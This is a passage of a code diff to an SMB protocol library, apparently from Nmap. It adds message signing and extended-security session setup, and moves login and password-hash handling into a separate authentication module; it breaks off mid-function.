+	if(smb['mac_key'] == nil) then
+		stdnse.print_debug(3, "SMB: Not signing message (missing mac_key)")
+		return true
+	elseif(nmap.registry.args.smbsign ~= "force" and bit.band(smb['security_mode'], 0x0A) ~= 0) then
+		stdnse.print_debug(3, "SMB: Not signing message (server doesn't support it -- default)")
+		return true
+	elseif(nmap.registry.args.smbsign == "disable" or nmap.registry.args.smbsign == "ignore") then
+		stdnse.print_debug(3, "SMB: Not signing message (disabled by user)")
+		return true
+	end
+
+	-- Pull out the signature that they used
+	local signature  = string.sub(body, 15, 22)
+
+	-- Turn the sequence into a string
+	local sequence   = bin.pack("<L", smb['sequence'])
+	-- Create a new string, with the sequence number in place
+	local new_packet = string.sub(body, 1, 14) .. sequence .. string.sub(body, 23)
+
+	-- Calculate the proper signature
+	local real_signature = smbauth.calculate_signature(smb['mac_key'], new_packet)
+
+	-- Validate the signature
+	return signature == real_signature
+end
+
 --- Prepends the NetBIOS header to the packet, which is essentially the length, encoded
 --  in 4 bytes of big endian, and sends it out. The length field is actually 17 or 24 bits 
 --  wide, depending on whether or not we're using raw, but that shouldn't matter. 
@@ -817,8 +858,12 @@ end
 function smb_send(smb, header, parameters, data)
     local encoded_parameters = smb_encode_parameters(parameters)
     local encoded_data       = smb_encode_data(data)
-    local len = string.len(header) + string.len(encoded_parameters) + string.len(encoded_data)
-    local out = bin.pack(">I<AAA", len, header, encoded_parameters, encoded_data)
+	local body               = header .. encoded_parameters .. encoded_data
+
+	-- Calculate the message signature
+	body = message_sign(smb, body)
+
+    local out = bin.pack(">I<A", string.len(body), body)
 
 	stdnse.print_debug(3, "SMB: Sending SMB packet (len: %d)", string.len(out))
     return smb['socket']:send(out)
@@ -828,11 +873,14 @@ end
 --  and data.
 --
 --@param smb The SMB object associated with the connection
+--@param read_data [optional] This function will read the data section if and only if
+--       this value is true. This is a workaround for a bug in the tree connect packet,
+--       where the length is set incorrectly. Default: true. 
 --@return (status, header, parameters, data) If status is true, the header, 
 --        parameters, and data are all the raw arrays (with the lengths already
 --        removed). If status is false, header contains an error message and parameters/
 --        data are undefined. 
-function smb_read(smb)
+function smb_read(smb, read_data)
 	local status, result
 	local pos, netbios_length, length, header, parameter_length, parameters, data_length, data
 
@@ -876,8 +924,14 @@ function smb_read(smb)
 	end
 
 	if(#result ~= length) then
-		stdnse.print_debug(1, "SMB: Received wrong number of bytes, there will likely be issues (recieved %d, expected %d)", #result, length)
-		return false, string.format("Didn't receive the expected number of bytes; recieved %d, expected %d. This will almost certainly cause some errors.", #result, length)
+		stdnse.print_debug(1, "SMB: ERROR: Received wrong number of bytes, there will likely be issues (recieved %d, expected %d)", #result, length)
+		return false, string.format("SMB: ERROR: Didn't receive the expected number of bytes; recieved %d, expected %d. This will almost certainly cause some errors.", #result, length)
+	end
+
+	-- Check the message signature (ignoring the first four bytes, which are the netbios header)
+	local good_signature = message_check_signature(smb, string.sub(result, 5))
+	if(good_signature == false) then
+		return false, "SMB: ERROR: Server returned invalid signature"
 	end
 
 	-- The header is 32 bytes.
@@ -905,9 +959,13 @@ function smb_read(smb)
 	end
 
 	-- Read that many bytes of data.
-	pos, data             = bin.unpack(string.format("<A%d", data_length),        result, pos)
-	if(data == nil) then
-		return false, "SMB: ERROR: Ran off the end of SMB packet; likely due to server truncation [7]"
+	if(read_data == nil or read_data == true) then
+		pos, data             = bin.unpack(string.format("<A%d", data_length),        result, pos)
+		if(data == nil) then
+			return false, "SMB: ERROR: Ran off the end of SMB packet; likely due to server truncation [7]"
+		end
+	else
+		data = nil
 	end
 
 	stdnse.print_debug(3, "SMB: Received %d bytes", string.len(result))
@@ -948,9 +1006,6 @@ function negotiate_protocol(smb)
 	local header, parameters, data
 	local pos
 	local header1, header2, header3, ehader4, command, status, flags, flags2, pid_high, signature, unused, pid, mid
-	local dialect, security_mode, max_mpx, max_vc, max_buffer, max_raw_buffer, session_key, capabilities, time, timezone, key_length
-	local server_challenge, date, timezone_str
-	local domain, server
 
 	header     = smb_encode_header(smb, command_codes['SMB_COM_NEGOTIATE'])
 
@@ -981,404 +1036,100 @@ function negotiate_protocol(smb)
 		return false, "SMB: ERROR: Ran off the end of SMB packet; likely due to server truncation [8]"
 	end
 
+	-- Since this is the first response seen, check any necessary flags here
+	if(bit.band(flags2, 0x0800) ~= 0x0800) then
+		smb['extended_security'] = false
+	end
+
 	-- Parse the parameter section
-	pos, dialect = bin.unpack("<S", parameters)
-	if(dialect == nil) then
+	pos, smb['dialect'] = bin.unpack("<S", parameters)
+	if(smb['dialect'] == nil) then
 		return false, "SMB: ERROR: Ran off the end of SMB packet; likely due to server truncation [9]"
 	end
 
 	-- Check if we ran off the packet
-	if(dialect == nil) then
+	if(smb['dialect'] == nil) then
 		return false, "SMB: ERROR: Ran off the end of SMB packet; likely due to server truncation [10]"
 	end
 	-- Check if the server didn't like our requested protocol
-	if(dialect ~= 0) then
-		return false, string.format("Server negotiated an unknown protocol (#%d) -- aborting", dialect)
+	if(smb['dialect'] ~= 0) then
+		return false, string.format("Server negotiated an unknown protocol (#%d) -- aborting", smb['dialect'])
 	end
 
-	pos, security_mode, max_mpx, max_vc, max_buffer, max_raw_buffer, session_key, capabilities, time, timezone, key_length = bin.unpack("<CSSIIIILsC", parameters, pos)
-	if(capabilities == nil) then
+	pos, smb['security_mode'], smb['max_mpx'], smb['max_vc'], smb['max_buffer'], smb['max_raw_buffer'], smb['session_key'], smb['capabilities'], smb['time'], smb['timezone'], smb['key_length'] = bin.unpack("<CSSIIIILsC", parameters, pos)
+	if(smb['capabilities'] == nil) then
 		return false, "SMB: ERROR: Ran off the end of SMB packet; likely due to server truncation [11]"
 	end
 	-- Some broken implementations of SMB don't send these variables
-	if(time == nil) then
+	if(smb['time'] == nil) then
 		time = 0
 	end
-	if(timezone == nil) then
+	if(smb['timezone'] == nil) then
 		timezone = 0
 	end
-	if(key_length == nil) then
+	if(smb['key_length'] == nil) then
 		key_length = 0
 	end
 
 	-- Convert the time and timezone to more useful values
-	time = (time / 10000000) - 11644473600
-	date = os.date("%Y-%m-%d %H:%M:%S", time)
-	timezone = -(timezone / 60)
-	if(timezone == 0) then
-		timezone_str = "UTC+0"
-	elseif(timezone < 0) then
-		timezone_str = "UTC-" .. math.abs(timezone)
+	smb['time'] = (smb['time'] / 10000000) - 11644473600
+	smb['date'] = os.date("%Y-%m-%d %H:%M:%S", smb['time'])
+	smb['timezone'] = -(smb['timezone'] / 60)
+	if(smb['timezone'] == 0) then
+		smb['timezone_str'] = "UTC+0"
+	elseif(smb['timezone'] < 0) then
+		smb['timezone_str'] = "UTC-" .. math.abs(smb['timezone'])
 	else
-		timezone_str = "UTC+" .. timezone
+		smb['timezone_str'] = "UTC+" .. smb['timezone']
 	end
 
 	-- Data section
-	-- This one's a little messier, because I don't appear to have unicode support
-	pos, server_challenge = bin.unpack(string.format("<A%d", key_length), data)
-	if(server_challenge == nil) then
-		return false, "SMB: ERROR: Ran off the end of SMB packet; likely due to server truncation [12]"
-	end
+	if(smb['extended_security'] == true) then
+		pos, smb['server_challenge'] = bin.unpack(string.format("<A%d", smb['key_length']), data)
+		if(smb['server_challenge'] == nil) then
+			return false, "SMB: ERROR: Ran off the end of SMB packet; likely due to server truncation [12]"
+		end
 
-	local ch, dummy
-	domain = ""
-	server = ""
-
-	-- Get the domain as a Unicode string
-	-- Note: This can be null, some configurations of Samba leave this off
-	pos, ch, dummy = bin.unpack("<CC", data, pos)
-	while ch ~= nil and ch ~= 0 do
-		domain = domain .. string.char(ch)
+		pos, smb['server_guid'] = bin.unpack("<A16", data, pos)
+		if(smb['server_guid'] == nil) then
+			return false, "SMB: ERROR: Ran off the end of SMB packet; likely due to server truncation [12]"
+		end
+	else
+		pos, smb['server_challenge'] = bin.unpack(string.format("<A%d", smb['key_length']), data)
+		if(smb['server_challenge'] == nil) then
+			return false, "SMB: ERROR: Ran off the end of SMB packet; likely due to server truncation [12]"
+		end
+	
+		-- Get the domain as a Unicode string
+		local ch, dummy
+		smb['domain'] = ""
+		smb['server'] = ""
+	
 		pos, ch, dummy = bin.unpack("<CC", data, pos)
-	end
-
-	-- Get the server name as a Unicode string
-	-- Note: This can be nil, Samba leaves this off
-	pos, ch, dummy = bin.unpack("<CC", data, pos)
-	while ch ~= nil and ch ~= 0 do
-		server = server .. string.char(ch)
+--		if(dummy == nil) then
+--			return false, "SMB: ERROR: Ran off the end of SMB packet; likely due to server truncation [13]"
+--		end
+		while ch ~= nil and ch ~= 0 do
+			smb['domain'] = smb['domain'] .. string.char(ch)
+			pos, ch, dummy = bin.unpack("<CC", data, pos)
+			if(dummy == nil) then
+				return false, "SMB: ERROR: Ran off the end of SMB packet; likely due to server truncation [14]"
+			end
+		end
+	
+		-- Get the server name as a Unicode string
+		-- Note: This can be nil, Samba leaves this off
 		pos, ch, dummy = bin.unpack("<CC", data, pos)
+		while ch ~= nil and ch ~= 0 do
+			smb['server'] = smb['server'] .. string.char(ch)
+			pos, ch, dummy = bin.unpack("<CC", data, pos)
+		end
 	end
 
-
-	-- Fill out smb variables
-	smb['security_mode']    = security_mode
-	smb['max_mpx']          = max_mpx
-	smb['max_vc']           = max_vc
-	smb['max_buffer']       = max_buffer
-	smb['max_raw_buffer']   = max_raw_buffer
-	smb['session_key']      = session_key
-	smb['capabilities']     = capabilities
-	smb['time']             = time
-	smb['date']             = date
-	smb['timezone']         = timezone
-	smb['timezone_str']     = timezone_str
-	smb['server_challenge'] = server_challenge
-	smb['domain']           = domain
-	smb['server']           = server
-
 	return true
 end
 
----Determines which hash type is going to be used, based on the function parameters, the registry, and 
--- the nmap arguments (in that order).
---
---@param hash_type [optional] The function parameter version, which will override all others if set. 
---@return The highest priority hash type that's set.
-local function get_hash_type(hash_type)
-	
-	if(hash_type ~= nil) then
-		stdnse.print_debug(2, "SMB: Using logon type passed as a parameter: %s", hash_type)
-	else
-		if(nmap.registry.args.smbtype ~= nil) then
-			hash_type = nmap.registry.args.smbtype
-			stdnse.print_debug(2, "SMB: Using logon type passed as an nmap parameter: %s", hash_type)
-		else
-			hash_type = "ntlm"
-			stdnse.print_debug(2, "SMB: Using default logon type: %s", hash_type)
-		end
-	end
-
-	return string.lower(hash_type)
-end
-
-
----Determines which username is going to be used, based on the function parameters, the registry, and 
--- the nmap arguments (in that order).
---
---@param ip       The ip address, used when reading from the registry
---@param username [optional] The function parameter version, which will override all others if set. 
---@return The highest priority username that's set.
-local function get_username(ip, username)
-
-	if(username ~= nil) then
-		stdnse.print_debug(2, "SMB: Using username passed as a parameter: %s", username)
-	else
-		if(nmap.registry[ip] ~= nil and nmap.registry[ip]['smbaccounts'] ~= nil and next(nmap.registry[ip]['smbaccounts']) ~= nil) then
-			if(nmap.registry[ip]['smbaccounts']['administrator'] ~= nil) then
-				-- If we found an administrator account, use it first
-				username = "administrator"
-			else
-				-- Otherwise, use whichever is first
-				username, _ = next(nmap.registry[ip]['smbaccounts'])
-			end
-			stdnse.print_debug(2, "SMB: Using username found in the registry: %s", username)
-		elseif(nmap.registry.args.smbusername ~= nil) then
-			username = nmap.registry.args.smbusername
-			stdnse.print_debug(2, "SMB: Using username passed as an nmap parameter (smbusername): %s", username)
-		elseif(nmap.registry.args.smbuser ~= nil) then
-			username = nmap.registry.args.smbuser
-			stdnse.print_debug(2, "SMB: Using username passed as an nmap parameter (smbuser): %s", username)
-		else
-			username = nil
-			stdnse.print_debug(2, "SMB: Couldn't find a username to use, not logging in")
-		end
-	end
-
-	return username
-end
-
----Determines which domain is going to be used, based on the function parameters, the registry, and 
--- the nmap arguments (in that order).
---
---@param domain [optional] The function parameter version, which will override all others if set. 
---@return The highest priority domain that's set.
-local function get_domain(domain)
-
-	if(domain ~= nil) then
-		stdnse.print_debug(2, "SMB: Using domain passed as a parameter: %s", domain)
-	else
-		if(nmap.registry.args.smbdomain ~= nil) then
-			domain = nmap.registry.args.smbdomain
-			stdnse.print_debug(2, "SMB: Using domain passed as an nmap parameter: %s", domain)
-		else
-			domain = ""
-			stdnse.print_debug(2, "SMB: Couldn't find domain to use, using blank")
-		end
-	end
-
-	return domain
-end
-
----Generate the Lanman and NTLM password hashes. The password itself is taken from the function parameters,
--- the registry, and the nmap arguments (in that order). If no password is set, then the password hash
--- is used (which is read from all the usual places). If neither is set, then a blank password is used. 
---
--- The output passwords are hashed based on the hash type. 
---
---@param ip       The ip address of the host, used for registry lookups. 
---@param username The username, which is used for v2 passwords. 
---@param domain The username, which is used for v2 passwords. 
---@param password [optional] The overriding password. 
---@param password_hash [optional] The overriding password hash. Shouldn't be set if password is set. 
---@param challenge The server challenge.
---@param hash_type The way in which to hash the password. 
---@return (lm_response, ntlm_response) The two strings that can be sent directly back to the server. 
-local function get_password_response(ip, username, domain, password, password_hash, challenge, hash_type)
-
-	local lm_hash   = nil
-	local ntlm_hash = nil
-
-	-- Check if there's a password set
-	if(password ~= nil) then
-		stdnse.print_debug(2, "SMB: Using password passed as a parameter")
-	else
-		if(nmap.registry[ip] ~= nil and nmap.registry[ip]['smbaccounts'] ~= nil and nmap.registry[ip]['smbaccounts'][username] ~= nil) then
-			password = nmap.registry[ip]['smbaccounts'][username]
-			stdnse.print_debug(2, "SMB: Using password found in the registry")
-		elseif(nmap.registry.args.smbpassword ~= nil) then
-			password = nmap.registry.args.smbpassword
-			stdnse.print_debug(2, "SMB: Using password passed as an nmap parameter (smbpassword)")
-		elseif(nmap.registry.args.smbpass ~= nil) then
-			password = nmap.registry.args.smbpass
-			stdnse.print_debug(2, "SMB: Using password passed as an nmap parameter (smbpass)")
-		else
-			password = nil
-			stdnse.print_debug(2, "SMB: Couldn't find password to use, checking for a useable hash")
-		end
-	end
-
-	-- If we got a password, hash it, otherwise, try getting a hash from the standard places
-	if(password ~= nil) then
-		-- Check if the password is blank; don't bother hashing a blank password
-		if(password == "") then
-			return "", ""
-		end
-
-		status, lm_hash   = lm_create_hash(password)
-		status, ntlm_hash = ntlm_create_hash(password)
-	else
-		local hashes = nil
-
-		if(nmap.registry.args.smbhash ~= nil) then
-			hashes = nmap.registry.args.smbhash
-
-			if(string.find(hashes, "^" .. string.rep("%x%x", 16) .. "$")) then
-				stdnse.print_debug(2, "SMB: Found a 16-byte hex string")
-				lm_hash   = bin.pack("H", hashes:sub(1, 32))
-				ntlm_hash = bin.pack("H", hashes:sub(1, 32))
-			elseif(string.find(hashes, "^" .. string.rep("%x%x", 32) .. "$")) then
-				stdnse.print_debug(2, "SMB: Found a 32-byte hex string")
-				lm_hash   = bin.pack("H", hashes:sub(1, 32))
-				ntlm_hash = bin.pack("H", hashes:sub(33, 64))
-			elseif(string.find(hashes, "^" .. string.rep("%x%x", 16) .. "." .. string.rep("%x%x", 16) .. "$")) then
-				stdnse.print_debug(2, "SMB: Found two 16-byte hex strings")
-				lm_hash   = bin.pack("H", hashes:sub(1, 32))
-				ntlm_hash = bin.pack("H", hashes:sub(34, 65))
-			else
-				stdnse.print_debug(1, "SMB: ERROR: Hash(es) provided in an invalid format (should be 32, 64, or 65 hex characters)")
-				lm_hash = nil
-				ntlm_hash = nil
-			end
-		end
-	end
-
-	-- At this point, we should have a good lm_hash and ntlm_hash if we're getting one
-	if(lm_hash == nil or ntlm_hash == nil) then
-		stdnse.print_debug(2, "SMB: Couldn't determine which password to use, using a blank one")
-		return "", ""
-	end
-
-	-- Output what we've got so far
-	stdnse.print_debug(2, "SMB: Lanman hash: %s", stdnse.tohex(lm_hash))
-	stdnse.print_debug(2, "SMB: NTLM   hash: %s", stdnse.tohex(ntlm_hash))
-			
-	-- Hash the password the way the user wants
-	if(hash_type == "v1") then
-		-- LM and NTLM are hashed with their respective algorithms
-		stdnse.print_debug(2, "SMB: Creating v1 response")
-		status, lm_response   = lm_create_response(lm_hash, challenge)
-		status, ntlm_response = ntlm_create_response(ntlm_hash, challenge)
-	elseif(hash_type == "lm") then
-		-- LM is hashed with its algorithm, NTLM is blank
-		stdnse.print_debug(2, "SMB: Creating LMv1 response")
-		status, lm_response   = lm_create_response(lm_hash, challenge)
-		        ntlm_response = ""
-	elseif(hash_type == "ntlm") then
-		-- LM and NTLM both use the NTLM algorithm
-		stdnse.print_debug(2, "SMB: Creating NTLMv1 response")
-		status, lm_response   = ntlm_create_response(ntlm_hash, challenge)
-		status, ntlm_response = ntlm_create_response(ntlm_hash, challenge)
-	elseif(hash_type == "v2") then
-		-- LM and NTLM are hashed with their respective v2 algorithms
-		stdnse.print_debug(2, "SMB: Creating v2 response")
-		status, lm_response   = lmv2_create_response(ntlm_hash, username, domain, challenge)
-		status, ntlm_response = ntlmv2_create_response(ntlm_hash, username, domain, challenge, 24)
-	elseif(hash_type == "lmv2") then
-		-- LM is hashed with its v2 algorithm, NTLM is blank
-		stdnse.print_debug(2, "SMB: Creating LMv2 response")
-		status, lm_response   = lmv2_create_response(ntlm_hash, username, domain, challenge)
-		        ntlm_response = ""
-	else
-		-- Default to NTLMv1
-		stdnse.print_debug(1, "SMB: Invalid login type specified, using default (NTLM)")
-		status, lm_response   = ntlm_create_response(ntlm_hash, challenge)
-		status, ntlm_response = ntlm_create_response(ntlm_hash, challenge)
-	end
-
-	stdnse.print_debug(2, "SMB: Lanman response: %s", stdnse.tohex(lm_response))
-	stdnse.print_debug(2, "SMB: NTLM   response: %s", stdnse.tohex(ntlm_response))
-
-	return lm_response, ntlm_response
-end
-
----Retrieves an array of logins to use, based on the various sources that logins can come from. Only one 
--- username/password pair are used, since it's very easy to lock out accounts on SMB servers. The first place
--- checked is the parameters passed to this function -- if they're set, that's what's used. If not, the registry
--- is checked (to see if another script set a username/password). If that fails, Nmap's arguments are checked. 
--- If that fails, no username/password is returned. 
---
--- In addition to the username/password pair, the 'guest' account may be returned with a blank password, and
--- the anonymous account (blank username/password) is returned. 
---
---@param ip            The IP of the host, which is used to look up the password in the registry.
---@param challenge     The challenge string sent by the server. 
---@param username      [optional] The username to override with. 
---@param domain        [optional] The domain to override with. 
---@param password      [optional] The password to override with. 
---@param password_hash [optional] The password hash to override this (shouldn't be used along with password). 
---@param hash_type     [optional] The type of hash to override with. 
---@param use_default   [optional] If set, will attempt anonymous/guest. Default: true.
---@return An array of tables, each of which contain a 'username', 'domain', 'lanman', 'ntlm'. 
-local function get_logins(ip, challenge, username, domain, password, password_hash, hash_type, use_default)
-
-	local response = {}
-
-	-- If we don't have OpenSSL, don't bother with any of this
-	if(have_ssl == true) then
-		-- We choose *one* username to try, here. First, see if the user set a username
-		-- in the function parameters, then in the registry, then as an nmap 
-		-- parameter, then disable it. 
-	
-		-- If a username was found, look for a domain and password
-		username = get_username(ip, username)
-		domain   = get_domain(domain)
-		hash_type = get_hash_type(hash_type)
-
-		if(username ~= nil) then
-			lm_response, ntlm_response = get_password_response(ip, username, domain, password, password_hash, challenge, hash_type)
-
-			if(lm_response ~= nil and ntlm_response ~= nil) then
-				local data = {}
-				data['username'] = username
-				data['domain']   = domain
-				data['lanman']   = lm_response
-				data['ntlm']     = ntlm_response
-				response[#response + 1] = data
-			end
-
-			if(lm_response == nil) then
-				lm_response = ""
-			end
-			if(ntlm_response == nil) then
-				ntlm_response = ""
-			end
-
-		end
-	else
-		stdnse.print_debug(1, "SMB: ERROR: Couldn't find OpenSSL library, only checking Guest and/or Anonymous accounts")
-	end
-
-	-- Check if we're using default accounts
-	if(use_default == nil or use_default == true) then
-		local data
-		-- Add guest account
-		data = {}
-		data['username'] = 'guest'
-		data['domain'] = ''
-		data['lanman'] = ''
-		data['ntlm'] = ''
-		response[#response + 1] = data
-	
-		-- Add the anonymous account
-		data = {}
-		data['username'] = ''
-		data['domain'] = ''
-		data['lanman'] = ''
-		data['ntlm'] = ''
-		response[#response + 1] = data
-	end
-
-	return response
-end
-
---- Sends out SMB_COM_SESSION_SETUP_ANDX, which attempts to log a user in. 
--- Sends the following:
--- * Negotiated parameters (multiplexed connections, virtual circuit, capabilities)
--- * Passwords (plaintext, unicode, lanman, ntlm, lmv2, ntlmv2, etc)
--- * Account name
--- * OS (I just send "Nmap")
--- * Native LAN Manager (no clue what that is, but it seems to be ignored)
---
--- Receives the following:
--- * User ID
--- * Server OS
---
---@param smb          The SMB object associated with the connection
---@param username     [optional] Overrides the account name to use. Will use Nmap parameters or registry by 
---                    default, or NULL session if it isn't set anywhere
---@param domain       [optional] Overrides the domain to use. 
---@param password     [optional] Overrides the password to use. Will use Nmap parameters or registry by default.
---@param hash_type    [optional] Overrides the hash type to use (can be v1, LM, NTLM, LMv2, v2). Default is 'NTLM'.
---@param use_default  [optional] If set, will attempt anonymous/guest. Default: true.
---@param log_errors   [optional] If set, will display login. Default: true. 
---@return (status, result) If status is false, result is an error message. Otherwise, result is nil and the following
---        elements are added to the smb table:
---    *  'uid'         The UserID for the session
---    *  'is_guest'    If set, the username wasn't found so the user was automatically logged in as the guest account
---    *  'os'          The operating system
---    *  'lanmanager'  The servers's LAN Manager
-function start_session(smb, username, domain, password, password_hash, hash_type, use_default, log_errors)
+function start_session_basic(smb, overrides, use_default, log_errors)
 	local i
 	local status, result
 	local header, parameters, data
@@ -1386,12 +1137,17 @@ function start_session(smb, username, domain, password, password_hash, hash_type
 	local header1, header2, header3, header4, command, status, flags, flags2, pid_high, signature, unused, tid, pid, uid, mid 
 	local andx_command, andx_reserved, andx_offset, action
 	local os, lanmanager
-	local logins = get_logins(smb['ip'], smb['server_challenge'], username, domain, password, password_hash, hash_type, use_default)
 
-	header     = smb_encode_header(smb, command_codes['SMB_COM_SESSION_SETUP_ANDX'])
+	local accounts  = smbauth.get_accounts(smb['ip'], overrides, use_default)
+
+	header = smb_encode_header(smb, command_codes['SMB_COM_SESSION_SETUP_ANDX'])
+
+	-- Loop through the credentials returned by get_accounts() (there should be 1 - 3, but we make no assumptions)
+	for i = 1, #accounts, 1 do
+		local lanman, ntlm
+
+		lanman, ntlm, smb['mac_key'] = smbauth.get_password_hashes(smb['ip'], accounts[i]['username'], accounts[i]['domain'], accounts[i]['hash_type'], overrides, smb['server_challenge'], false)
 
-	-- Loop through the credentials returned by get_logins() (there should be 2 or 3)
-	for i = 1, #logins, 1 do
 		-- Parameters
 		parameters = bin.pack("<CCSSSSISSII", 
 					0xFF,               -- ANDX -- no further commands
@@ -1401,21 +1157,22 @@ function start_session(smb, username, domain, password, password_hash, hash_type
 					0x0001,             -- Max multiplexes
 					0x0000,             -- Virtual circuit num
 					smb['session_key'], -- The session key
-					#logins[i]['lanman'], -- ANSI/Lanman password length
-					#logins[i]['ntlm'],   -- Unicode/NTLM password length
-					0,                  -- Reserved
+					#lanman,            -- ANSI/Lanman password length
+					#ntlm,              -- Unicode/NTLM password length
+					0x00000000,         -- Reserved
 	                0x00000050          -- Capabilities
 				)
 	
 		-- Data is a list of strings, terminated by a blank one. 
 		data       = bin.pack("<AAzzzz", 
-					logins[i]['lanman'],   -- ANSI/Lanman password
-					logins[i]['ntlm'],     -- Unicode/NTLM password
-					logins[i]['username'], -- Account
-					logins[i]['domain'],   -- Domain
-					"Nmap",                -- OS
-					"Native Lanman"        -- Native LAN Manager
+					lanman,                 -- ANSI/Lanman password
+					ntlm,                   -- Unicode/NTLM password
+					accounts[i]['username'],-- Account
+					accounts[i]['domain'],  -- Domain
+					"Nmap",                 -- OS
+					"Native Lanman"         -- Native LAN Manager
 				)
+
 		-- Send the session setup request
 		stdnse.print_debug(2, "SMB: Sending SMB_COM_SESSION_SETUP_ANDX")
 		result, err = smb_send(smb, header, parameters, data)
@@ -1457,7 +1214,7 @@ function start_session(smb, username, domain, password, password_hash, hash_type
 			smb['os']         = os
 			smb['lanmanager'] = lanmanager
 
-			-- Check if they're using an un-supported system [TODO: once I sort this out, remove the warning]
+			-- Check if they're using an un-supported system
 			if(os == nil or lanmanager == nil or domain == nil) then
 				stdnse.print_debug(1, "SMB: WARNING: the server is using a non-standard SMB implementation; your mileage may vary (%s)", smb['ip'])
 			elseif(os == "Unix" or string.sub(lanmanager, 1, 5) == "Samba") then
@@ -1467,18 +1224,21 @@ function start_session(smb, username, domain, password, password_hash, hash_type
 			-- Check if they were logged in as a guest
 			if(log_errors == nil or log_errors == true) then
 				if(smb['is_guest'] == 1) then
-					stdnse.print_debug(1, "SMB: Login as %s\\%s failed, but was given guest access (username may be wrong, or system may only allow guest)", logins[i]['domain'], string_or_blank(logins[i]['username']))
+					stdnse.print_debug(1, "SMB: Login as %s\\%s failed, but was given guest access (username may be wrong, or system may only allow guest)", accounts[i]['domain'], string_or_blank(accounts[i]['username']))
 				else
-					stdnse.print_debug(1, "SMB: Login as %s\\%s succeeded", logins[i]['domain'], string_or_blank(logins[i]['username']))
+					stdnse.print_debug(1, "SMB: Login as %s\\%s succeeded", accounts[i]['domain'], string_or_blank(accounts[i]['username']))
 				end
 			end
-		
+
+			-- Set the initial sequence number
+			smb['sequence'] = 1
+
 			return true
 
 		else
 			-- This username failed, print a warning and keep going
 			if(log_errors == nil or log_errors == true) then
-				stdnse.print_debug(1, "SMB: Login as %s\\%s failed (%s)", logins[i]['domain'], string_or_blank(logins[i]['username']), get_status_name(status))
+				stdnse.print_debug(1, "SMB: Login as %s\\%s failed (%s)", accounts[i]['domain'], string_or_blank(accounts[i]['username']), get_status_name(status))
 			end
 		end
 	end
@@ -1486,8 +1246,177 @@ function start_session(smb, username, domain, password, password_hash, hash_type
 	if(log_errors == nil or log_errors == true) then
 		stdnse.print_debug(1, "SMB: ERROR: All logins failed, sorry it didn't work out!")
 	end
-	return false, get_status_name(status)
 
+	return false, get_status_name(status)
+end
+
+function start_session_extended(smb, overrides, use_default, log_errors)
+	local i
+	local status, status_name, result
+	local header, parameters, data
+	local pos
+	local header1, header2, header3, header4, command, status, flags, flags2, pid_high, signature, unused, tid, pid, uid, mid 
+	local andx_command, andx_reserved, andx_offset, action, security_blob_length
+	local os, lanmanager
+
+	local accounts  = smbauth.get_accounts(smb['ip'], overrides, use_default)
+
+	-- Loop through the credentials returned by get_accounts() (there should be 1 - 3, but we make no assumptions)
+	for i = 1, #accounts, 1 do
+		-- These are loop variables
+		local security_blob = nil
+		local security_blob_length = 0
+
+		-- This loop takes care of the multiple packets that "extended security" requires
+		repeat
+			-- Get the new security blob, passing the old security blob as a parameter. If there was no previous security blob, then nil is passed, which creates a new one
+			status, security_blob, smb['mac_key'] = smbauth.get_security_blob(security_blob, smb['ip'], accounts[i]['username'], accounts[i]['domain'], accounts[i]['hash_type'], overrides, use_defaults)
+
+			-- There was an error processing the security blob	
+			if(status == false) then
+				return false, string.format("SMB: ERROR: Security blob: %s", security_blob)
+			end
+	
+			header     = smb_encode_header(smb, command_codes['SMB_COM_SESSION_SETUP_ANDX'])
+			-- Parameters
+			parameters = bin.pack("<CCSSSSISII", 
+						0xFF,               -- ANDX -- no further commands
+						0x00,               -- ANDX -- Reserved (0)
+						0x0000,             -- ANDX -- next offset
+						0xFFFF,             -- Max buffer size
+						0x0001,             -- Max multiplexes
+						0x0000,             -- Virtual circuit num
+						smb['session_key'], -- The session key
+						#security_blob,     -- Security blob length
+						0x00000000,         -- Reserved
+		                0x80000050          -- Capabilities
+					)
+		
+			-- Data is a list of strings, terminated by a blank one. 
+			data       = bin.pack("<Azzz", 
+						security_blob,         -- Security blob
+						"Nmap",                -- OS
+						"Native Lanman",       -- Native LAN Manager
+						""                     -- Primary domain
+					)
+	
+			-- Send the session setup request
+			stdnse.print_debug(2, "SMB: Sending SMB_COM_SESSION_SETUP_ANDX")
+			result, err = smb_send(smb, header, parameters, data)
+			if(result == false) then
+				return false, err
+			end
+		
+			-- Read the result
+			status, header, parameters, data = smb_read(smb)
+			if(status ~= true) then
+				return false, header
+			end
+		
+			-- Check if we were allowed in
+			pos, header1, header2, header3, header4, command, status, flags, flags2, pid_high, signature, unused, tid, pid, uid, mid = bin.unpack("<CCCCCICSSlSSSSS", header)
+			if(mid == nil) then
+				return false, "SMB: ERROR: Ran off the end of SMB packet; likely due to server truncation [17]"
+				end
+			smb['uid'] = uid
+
+			-- Get a human readable name
+			status_name = get_status_name(status)
+	
+			-- Only parse the parameters if it's ok or if we're going to keep going
+			if(status_name == "NT_STATUS_OK" or status_name == "NT_STATUS_MORE_PROCESSING_REQUIRED") then
+				-- Parse the parameters
+				pos, andx_command, andx_reserved, andx_offset, action, security_blob_length = bin.unpack("<CCSSS", parameters)
+				if(security_blob_length == nil) then
+					return false, "SMB: ERROR: Ran off the end of SMB packet; likely due to server truncation [18]"
+				end
+				smb['is_guest']   = bit.band(action, 1)
+		
+				-- Parse the data
+				pos, security_blob, os, lanmanager = bin.unpack(string.format("<A%dzz", security_blob_length), data)
+				if(lanmanager == nil) then
+					return false, "SMB: ERROR: Ran off the end of SMB packet; likely due to server truncation [19]"
+				end
+				smb['os']         = os
+				smb['lanmanager'] = lanmanager
+	
+				-- If it's ok, do a cleanup and return true
+				if(status_name == "NT_STATUS_OK") then
+					-- Check if they're using an un-supported system
+					if(os == nil or lanmanager == nil) then
+						stdnse.print_debug(1, "SMB: WARNING: the server is using a non-standard SMB implementation; your mileage may vary (%s)", smb['ip'])
+					elseif(os == "Unix" or string.sub(lanmanager, 1, 5) == "Samba") then
+						stdnse.print_debug(1, "SMB: WARNING: the server appears to be Unix; your mileage may vary.")
+					end
+				
+					-- Check if they were logged in as a guest
+					if(log_errors == nil or log_errors == true) then
+						if(smb['is_guest'] == 1) then
+							stdnse.print_debug(1, string.format("SMB: Extended login as %s\\%s failed, but was given guest access (username may be wrong, or system may only allow guest)", accounts[i]['domain'], string_or_blank(accounts[i]['username'])))
+						else
+							stdnse.print_debug(1, string.format("SMB: Extended login as %s\\%s succeeded", accounts[i]['domain'], string_or_blank(accounts[i]['username'])))
+						end
+					end
+	
+					-- Set the initial sequence number
+					smb['sequence'] = 1
+
+					return true
+				end -- Status is ok
